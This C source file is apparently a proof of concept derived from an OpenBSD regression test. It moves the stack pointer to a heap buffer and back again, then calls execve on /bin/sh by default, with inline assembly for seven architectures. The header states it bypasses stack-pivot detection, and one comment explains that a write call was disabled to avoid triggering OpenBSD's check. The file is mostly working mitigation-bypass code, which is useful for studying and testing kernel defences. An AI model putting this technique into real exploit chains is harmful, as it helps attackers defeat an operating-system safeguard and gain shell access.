/*
 * stackpivot-jumpback-bypass.c - pivot the stack and call execve(2)
 * Improved version which bypasses stack pivot detection
 * using the technique described in: https://archive.ph/xS2Fl#selection-13.0-243.52
 *
 * Based in part upon OpenBSD's /usr/src/regress/sys/kern/stackpivot
 * Released under the same license.
 */

#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024)

static char **target_argv;
static char **target_envp;

/*
 * This global pointer will hold the address in the original stack
 * that we want to pivot back to.
 */
static void *original_stack_ptr;

/*
 * pivot:
 *   Pivots the stack pointer to 'newstack' and transfers control
 *   to the address stored at *newstack.
 */
static void pivot(void *newstack)
{
#if defined(__x86_64__)
	/*
	 * x86_64:
	 * 1. Move newstack pointer into RSP.
	 * 2. RET pops the return address (RIP) from the new stack.
	 */
	asm volatile("mov %0, %%rsp\n\t"
	             "ret\n\t" ::"r"(newstack)
	             : "memory");

#elif defined(__aarch64__)
	/*
	 * AArch64:
	 * 1. Load the return address (LR/x30) from *newstack.
	 * 2. Move newstack into SP.
	 * 3. RET jumps to LR.
	 */
	asm volatile("ldr x30, [%0]\n\t"
	             "mov sp, %0\n\t"
	             "ret\n\t" ::"r"(newstack)
	             : "x30", "memory");

#elif defined(__i386__)
	/*
	 * i386:
	 * 1. Move newstack into ESP.
	 * 2. RET pops EIP.
	 */
	asm volatile("mov %0, %%esp\n\t"
	             "ret\n\t" ::"r"(newstack)
	             : "memory");

#elif defined(__riscv)
	/*
	 * RISC-V:
	 * 1. Load RA from 0(newstack).
	 * 2. Move newstack to SP.
	 * 3. RET (jr ra).
	 */
	asm volatile("ld ra, 0(%0)\n\t"
	             "mv sp, %0\n\t"
	             "ret\n\t" ::"r"(newstack)
	             : "ra", "memory");

#elif defined(__powerpc64__)
	/*
	 * PowerPC64:
	 * We need to handle both ELFv1 (Function Descriptors),
	 * and ELFv2 (Global Entry). In both cases, *newstack (0(r1))
	 * contains the function pointer.
	 */
	asm volatile("mr %%r1, %0\n\t"       /* Switch stack pointer */
	             "ld %%r12, 0(%%r1)\n\t" /* Load function pointer into r12 */
#if defined(_CALL_ELF) && _CALL_ELF == 2
	             /* ELFv2: r12 holds the code address. */
	             "mtctr %%r12\n\t" /* Move code address to CTR */
	             "bctr\n\t"        /* Branch to CTR */
#else
	             /* ELFv1: r12 points to the function descriptor. */
	             "ld %%r0, 0(%%r12)\n\t"   /* r0 = entry point (0 offset) */
	             "ld %%r2, 8(%%r12)\n\t"   /* r2 = TOC pointer (8 offset) */
	             "ld %%r11, 16(%%r12)\n\t" /* r11 = Environment (16 offset) */
	             "mtctr %%r0\n\t"          /* Move entry point to CTR */
	             "bctr\n\t"                /* Branch to CTR */
#endif
	             ::"r"(newstack)
	             : "r0", "r11", "r12", "ctr", "memory");
#elif defined(__loongarch64)
	/*
	 * LoongArch64:
	 * 1. Load RA ($r1) from 0(newstack).
	 * 2. Move newstack to SP ($r3).
	 * 3. RET (jirl $r0, $r1, 0).
	 */
	asm volatile("ld.d $r1, %0, 0\n\t"
	             "move $r3, %0\n\t"
	             "jirl $r0, $r1, 0\n\t" ::"r"(newstack)
	             : "$r1", "memory");

#elif defined(__s390x__)
	/*
	 * s390x:
	 * 1. Load RA (r14) from 0(newstack).
	 * 2. Move newstack to SP (r15).
	 * 3. BR r14.
	 */
	asm volatile("lg %%r14, 0(%0)\n\t"
	             "lgr %%r15, %0\n\t"
	             "br %%r14\n\t" ::"r"(newstack)
	             : "r14", "memory");


#else
#error "Architecture not supported. Please implement pivot logic."
#endif
	__builtin_unreachable();
}

static void final_exec(void)
{
	printf("[*] Back on main stack. Calling execve...\n");
	execve(target_argv[0], target_argv, target_envp);
	_exit(errno);
}

static void intermediate_stage(void)
{
	/*
	 * This write(2) will trigger detection on OpenBSD.
	printf("[*] Running on heap stack. Pivoting back to main stack at %p...\n",
	       original_stack_ptr);
	*/
	pivot(original_stack_ptr);
}

int main(int argc, char **argv, char **envp)
{
	/* Set up globals and allocate the stack on the heap. */
	if (argc < 2) {
		static char *default_argv[] = {"/bin/sh", NULL};
		target_argv = default_argv;
	} else {
		target_argv = &argv[1];
	}
	target_envp = envp;

	void *stack_base = malloc(STACK_SIZE);
	if (!stack_base) {
		perror("malloc");
		return 1;
	}

	/* Start at the top of the allocation and align to 16 bytes. */
	uintptr_t stack_top = (uintptr_t)stack_base + STACK_SIZE;
	stack_top &= ~0xF;

	/*
	 * Reserve space for the return address (the function pointer we mimic).
	 * We purposefully position the stack pointer slightly below the absolute
	 * end of the buffer to avoid immediate overflow.
	 *
	 * We use a safe offset of 32 bytes (must be larger than pointer size).
	 */
	uintptr_t *new_sp = (uintptr_t *)(stack_top - 32);

	/*
	 * "Push" the address of intermediate_stage onto our new stack.
	 * The 'pivot' function treats this value as the return address.
	 */
	*new_sp = (uintptr_t)intermediate_stage;

	/*
	 * Prepare the return to the original stack.
	 * We capture a location on the current stack using a local buffer.
	 */
	uintptr_t main_stack_buffer[16];
	/*
	 * Align to 16 bytes. We take the end of the buffer to simulate a stack top.
	 */
	uintptr_t ms_offset = (uintptr_t)main_stack_buffer + sizeof(main_stack_buffer);
	ms_offset &= ~0xF;

	/* Same safe offset logic */
	uintptr_t *restore_sp = (uintptr_t *)(ms_offset - 32);
	*restore_sp = (uintptr_t)final_exec;
	original_stack_ptr = restore_sp;

	printf("[*] Allocated heap stack at %p - %p\n", stack_base,
	       (void *)stack_top);
	printf("[*] Main stack return set to %p\n", original_stack_ptr);
	printf("[*] Pivoting SP to %p and jumping to intermediate_stage...\n", new_sp);

	/* All set, go! */
	pivot(new_sp);

	/* Should not be reached. */
	return 1;
}
